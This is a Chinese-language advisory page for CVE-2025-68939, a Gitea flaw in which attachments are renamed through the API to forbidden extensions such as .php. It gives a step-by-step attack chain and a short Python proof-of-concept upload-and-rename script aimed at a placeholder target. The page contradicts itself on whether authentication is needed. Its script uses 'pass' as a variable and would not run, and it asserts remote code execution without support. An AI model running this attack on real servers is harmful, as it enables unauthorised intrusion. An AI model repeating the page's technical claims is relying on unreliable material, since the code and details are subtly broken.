CVE-2025-68939 CVSS 8.2 高危

CVE-2025-68939 Gitea附件上传绕过安全限制漏洞

披露日期: 2025-12-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-68939

漏洞类型

安全限制绕过

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Gitea

漏洞概述

Gitea 1.23.0之前版本存在安全漏洞，攻击者可以通过编辑附件名称来添加具有禁止文件扩展名的附件。该漏洞允许绕过系统对上传文件类型的限制，可能导致恶意文件上传，如可执行脚本、webshell等。攻击者利用Gitea的附件API，通过修改附件名称的方式上传禁止的文件类型，从而在服务器上执行任意代码或进行其他恶意操作。此漏洞无需认证即可利用，但需要用户交互。CVSS评分8.2，属于高危漏洞。

技术细节

漏洞源于Gitea对附件上传时的文件扩展名验证不完整。系统在上传时检查了文件扩展名，但允许通过API编辑附件名称来绕过这一限制。攻击者可以先上传一个允许的文件（如图片），然后修改其名称为包含恶意扩展名（如.php、.jsp等）的文件名，从而在服务器上创建可执行文件。漏洞影响Gitea 1.23.0之前的所有版本，攻击者可以利用此漏洞实现远程代码执行。

攻击链分析

STEP 1

攻击者访问Gitea实例并上传一个允许的文件类型（如.jpg）

STEP 2

通过API编辑附件名称，将扩展名修改为禁止的扩展名（如.php）

STEP 3

服务器保存修改后的文件名，绕过扩展名检查

STEP 4

访问恶意文件，在服务器上执行任意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2025-68939
# Upload a benign file then rename it to malicious extension

url = "http://target-gitea.com"
upload_url = f"{url}/api/v1/repos/{owner}/{repo}/attachments"

# Step 1: Upload legitimate file
files = {'file': ('test.jpg', b'fake image', 'image/jpeg')}
response = requests.post(upload_url, files=files, auth=(user, pass))
attachment_id = response.json()[0]['id']

# Step 2: Rename to malicious extension
rename_url = f"{url}/api/v1/repos/{owner}/{repo}/attachments/{attachment_id}"
requests.patch(rename_url, json={'name': 'test.php'}, auth=(user, pass))

影响范围

Gitea < 1.23.0

防御指南

临时缓解措施

立即升级Gitea到1.23.0或更新版本，同时监控异常的文件上传活动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-68939
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-68939
3 Details https://www.cvedetails.com/cve/CVE-2025-68939/
4 VulDB https://vuldb.com/cve/CVE-2025-68939
5 Link https://blog.gitea.com/release-of-1.23.0/
6 Link https://github.com/go-gitea/gitea/pull/32151
7 Link https://github.com/go-gitea/gitea/releases/tag/v1.23.0

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表